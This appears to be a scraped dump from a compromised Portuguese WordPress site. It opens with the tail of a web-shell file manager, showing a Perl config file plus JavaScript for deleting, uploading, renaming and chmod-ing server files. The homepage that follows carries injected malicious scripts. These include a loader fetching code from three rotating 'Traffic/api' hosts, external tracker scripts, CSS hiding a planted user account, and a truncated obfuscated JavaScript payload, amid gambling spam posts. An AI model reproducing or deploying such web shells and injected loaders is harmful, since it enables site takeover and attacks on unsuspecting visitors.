version_patchlevel_string=&#039;version 32 subversion 1&#039;
versiononly=&#039;undef&#039;
vi=&#039;&#039;
xlibpth=&#039;/usr/lib/386 /lib/386&#039;
yacc=&#039;yacc&#039;
yaccflags=&#039;&#039;
zcat=&#039;&#039;
zip=&#039;zip&#039;
!END!

my $i = ord(8);
foreach my $c (7,6,5,4,3,2,1) { $i &lt;&lt;= 8; $i |= ord($c); }
our $byteorder = join(&#039;&#039;, unpack(&#039;aaaaaaaa&#039;, pack(&#039;L!&#039;, $i)));
s/(byteorder=)([&#039;&quot;]).*?\2/$1$2$Config::byteorder$2/m;

my $config_sh_len = length $_;

our $Config_SH_expanded = &quot;\n$_&quot; . &lt;&lt; &#039;EOVIRTUAL&#039;;
ccflags_nolargefiles=&#039;-D_REENTRANT -D_GNU_SOURCE -O2 -flto=auto -ffat-lto-objects -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -march=x86-64-v2 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -fwrapv -fno-strict-aliasing -I/usr/local/include &#039;
ldflags_nolargefiles=&#039;-Wl,-z,relro -Wl,--as-needed -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1  -fstack-protector-strong -L/usr/local/lib&#039;
libs_nolargefiles=&#039;-lpthread -lresolv -lgdbm -ldb -ldl -lm -lcrypt -lutil -lc -lgdbm_compat&#039;
libswanted_nolargefiles=&#039;cl pthread socket resolv inet nsl gdbm dbm db malloc dl ld sun m crypt sec util c cposix posix ucb BSD gdbm_compat&#039;
ccwarnflags=&#039; -Werror=pointer-arith -Wextra -Wc++-compat -Wwrite-strings -Werror=declaration-after-statement&#039;
ccstdflags=&#039; -std=c89&#039;
EOVIRTUAL
eval {
	# do not have hairy conniptions if this isnt available
	require &#039;Config_git.pl&#039;;
	$Config_SH_expanded .= $Config::Git_Data;
	1;
} or warn &quot;Warning: failed to load Config_git.pl, something strange about this perl...\n&quot;;

# Search for it in the big string
sub fetch_string {
    my($self, $key) = @_;

    return undef unless $Config_SH_expanded =~ /\n$key=\&#039;(.*?)\&#039;\n/s;
    # So we can say &quot;if $Config{&#039;foo&#039;}&quot;.
    $self-&gt;{$key} = $1 eq &#039;undef&#039; ? undef : $1;
}

my $prevpos = 0;

sub FIRSTKEY {
    $prevpos = 0;
    substr($Config_SH_expanded, 1, index($Config_SH_expanded, &#039;=&#039;) - 1 );
}

sub NEXTKEY {
    my $pos = index($Config_SH_expanded, qq(&#039;\n), $prevpos) + 2;
    my $len = index($Config_SH_expanded, &quot;=&quot;, $pos) - $pos;
    $prevpos = $pos;
    $len &gt; 0 ? substr($Config_SH_expanded, $pos, $len) : undef;
}

sub EXISTS {
    return 1 if exists($_[0]-&gt;{$_[1]});

    return(index($Config_SH_expanded, &quot;\n$_[1]=&#039;&quot;) != -1
          );
}

sub STORE  { die &quot;\%Config::Config is read-only\n&quot; }
*DELETE = *CLEAR = \*STORE; # Typeglob aliasing uses less space

sub config_sh {
    substr $Config_SH_expanded, 1, $config_sh_len;
}

sub config_re {
    my $re = shift;
    return map { chomp; $_ } grep eval{ /^(?:$re)=/ }, split /^/,
    $Config_SH_expanded;
}

sub config_vars {
    # implements -V:cfgvar option (see perlrun -V:)
    foreach (@_) {
	# find optional leading, trailing colons; and query-spec
	my ($notag,$qry,$lncont) = m/^(:)?(.*?)(:)?$/;	# flags fore and aft, 
	# map colon-flags to print decorations
	my $prfx = $notag ? &#039;&#039;: &quot;$qry=&quot;;		# tag-prefix for print
	my $lnend = $lncont ? &#039; &#039; : &quot;;\n&quot;;		# line ending for print

	# all config-vars are by definition \w only, any \W means regex
	if ($qry =~ /\W/) {
	    my @matches = config_re($qry);
	    print map &quot;$_$lnend&quot;, @matches ? @matches : &quot;$qry: not found&quot;		if !$notag;
	    print map { s/\w+=//; &quot;$_$lnend&quot; } @matches ? @matches : &quot;$qry: not found&quot;	if  $notag;
	} else {
	    my $v = (exists $Config::Config{$qry}) ? $Config::Config{$qry}
						   : &#039;UNKNOWN&#039;;
	    $v = &#039;undef&#039; unless defined $v;
	    print &quot;${prfx}&#039;${v}&#039;$lnend&quot;;
	}
    }
}

# Called by the real AUTOLOAD
sub launcher {
    undef &amp;AUTOLOAD;
    goto \&amp;$Config::AUTOLOAD;
}

1;
</textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Flib64%2Fperl5" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/lib64/perl5';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//combenipi9231.xyz' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a893e0b28945*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://combenipi9231.xyz/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/%d1%8f%d0%ba-%d1%80%d0%be%d0%b7%d0%bf%d1%96%d0%b7%d0%bd%d0%b0%d1%82%d0%b8-%d0%bf%d0%b5%d1%80%d1%88%d1%96-%d0%be%d0%b7%d0%bd%d0%b0%d0%ba%d0%b8-%d0%b4%d0%b5%d1%84%d1%96%d1%86%d0%b8%d1%82%d1%83-%d0%b2/">Як розпізнати перші ознаки дефіциту вітамінів в організмі</a></h2><p>Вітаміни є важливими елементами для нормального функціонування нашого організму. Вони беруть участь у багатьох біохімічних процесах, що забезпечують наше здоров&#8217;я. Однак, недостатнє споживання вітамінів може призвести до різних проблем зі здоров&#8217;ям. Важливо вміти розпізнавати перші ознаки дефіциту вітамінів, investjournal.com.ua щоб вчасно вжити заходів для їх усунення. Першими ознаками дефіциту вітамінів можуть бути загальна втома та [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/reviewed-gambling-australian-players-trust-in-2026/">Reviewed Gambling Australian Players Trust in 2026</a></h2><p>Australian punters have always had a keen eye for a fair go, and the online betting landscape reflects that no-nonsense attitude. With the rise of digital platforms, more locals are scanning through reviewed gambling Australian options before handing over their hard-earned cash. It is not just about flashy bonuses or free spins anymore; transparency</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/roulette-casino-strategien-tipps-und-tricks-fur-ein-erfolgreiches-spiel/">Roulette Casino Strategien: Tipps und Tricks für ein erfolgreiches Spiel</a></h2><p>Das Roulette-Spiel im Online Casino ist ein Klassiker, der sowohl Anfänger als auch erfahrene Spieler anzieht. Mit den richtigen Strategien kann man seine Gewinnchancen maximieren und das Spiel noch spannender gestalten. In diesem Artikel werden wir die besten Roulette Casino Strategien vorstellen, die Ihnen helfen können, beim Spielen im Online</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/the-best-casino-for-online-roulette-uk-2026/">The Best Casino for Online Roulette UK 2026</a></h2><p>If you&#8217;re a fan of online roulette, you&#8217;re probably always on the lookout for the best casinos to play at. With so many options available, it can be challenging to find a reliable and trustworthy platform that offers an exceptional gaming experience. In this article, we will explore the best casino for online roulette in [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/roulette-high-stakes-india-for-pc-a-complete-guide/">Roulette High Stakes India for PC: A Complete Guide</a></h2><p>Are you a fan of high-stakes casino games and looking to try your luck at online roulette in India? Look no further! In this comprehensive guide, we will explore everything you need to know about playing roulette high stakes in India for PC. From gameplay tips to the best online casinos offering high-stakes roulette, we&#8217;ve [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/best-british-slot-websites-harbors-incentives-ratings-august-2026/">Best British Slot Websites Harbors, Incentives &#038; Ratings August 2026</a></h2><p>Articles The newest Ports Weekly Megaways Ports British online casino of one&#8217;s week Better United kingdom On line Slot Websites &#x2013; Complete Ratings Duelz is actually our very own choice for slots with a high volatility; he&#8217;s got plenty of game offering bigger wins but smaller repeated earnings if that&#x2019;s what you choose. Normal people [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/paypal-gambling-enterprises-2026-best-casinos-on-the-internet-acknowledging-paypal/">PayPal Gambling enterprises 2026 Best Casinos on the internet acknowledging PayPal</a></h2><p>Posts How we Select the right Web based casinos How to pick PayPal as the an installment in the Casinos? Caesars is actually personal behind, when you are DraftKings is actually legitimate but a bit slower for the huge profits. BetMGM and hard Stone have been the quickest to possess withdrawals within research.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/greatest-online-slots-2026-gamble-harbors-for-real-currency/">Greatest Online slots 2026: Gamble Harbors for real Currency</a></h2><p>Content Cryptocurrency and online Gaming Doors away from Olympus from the Practical Gamble The way we Review a knowledgeable Real cash Online slots &#x1F6E1;&#xFE0F; The things i Take a look at Just before To play a bona fide Money Slot One another online slots and you may real cash harbors provide benefits, handling varied athlete [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/finest-totally-free-slots-programs-to-own-android-2026-greatest-android-harbors/">Finest Totally free Slots Programs to own Android 2026 Greatest Android Harbors</a></h2><p>Articles Fortunate Win Gambling enterprise Public apps slim more to the gold coins and you will revolves since the advantages. It&#x2019;s smart&#x2014;they features people checking inside the even when they&#x2019;lso are not attending play much time classes. Before hitting establish, take a quick peek during the just what application desires usage of.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/22/5-dragons-pokie-trial-enjoy-free-revolves/">5 Dragons Pokie Trial Enjoy &#038; Free Revolves</a></h2><p>Blogs 100 percent free 5 Dragons Game &#x2013; The place to start? Dragons Slot Australian continent Evaluation Laws and regulations and you may Game play Paytable: 100 percent free 5 Dragons slots no install A common approach one of typical participants is to prevent the class whenever the balance are at 150% of the doing [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/?edit=1&#038;p=%2Fusr%2Flib64%2Fperl5&#038;path=%2Fusr%2Flib64%2Fperl5%2FConfig_heavy.pl" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
"use strict";var rxdmS4,FlCAu25,g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;const FZHYVb=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x5d,0x10,0x200,0xf,0x3,0x2,0x4,0x3ff,0x7f,0x1f,0x80,0x12,0x20,0x5,0x18,0xa,0x13,0x40,0xffff,"js",0x82,!0x1];function R_2lkdW(rxdmS4){var FlCAu25="<,^7;9x`%1.0+g~o:JG*fp]ca2O#m}B[bX5d{(wt=iA&TEUINLV$erR_?yKl|YCHvuknW/Z6)>Q8DshzSP4M3!\"Fq@j",g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;N4W9hYK(g3Gld7J=""+(rxdmS4||""),_PoKZj=g3Gld7J.length,MSUxhJ2=[],cUL0VT=FZHYVb[0x0],j2tRUWQ=FZHYVb[0x0],Q4sOnFn=-FZHYVb[0x1]);for(nco7OV=FZHYVb[0x0];nco7OV<_PoKZj;nco7OV++){var R_2lkdW=FlCAu25.indexOf(g3Gld7J[nco7OV]);if(R_2lkdW===-FZHYVb[0x1])continue;if(Q4sOnFn<FZHYVb[0x0]){Q4sOnFn=R_2lkdW}else{N4W9hYK(Q4sOnFn+=R_2lkdW*FZHYVb[0xc],cUL0VT|=Q4sOnFn<<j2tRUWQ,j2tRUWQ+=(Q4sOnFn&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(MSUxhJ2.push(cUL0VT&FZHYVb[0x3]),cUL0VT>>=FZHYVb[0x2],j2tRUWQ-=FZHYVb[0x2])}while(j2tRUWQ>FZHYVb[0x9]);Q4sOnFn=-FZHYVb[0x1]}}if(Q4sOnFn>-FZHYVb[0x1]){MSUxhJ2.push((cUL0VT|Q4sOnFn<<j2tRUWQ)&FZHYVb[0x3])}return t24J32(MSUxhJ2)}function s7MFvm(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=R_2lkdW(FlCAu25[g3Gld7J])}return 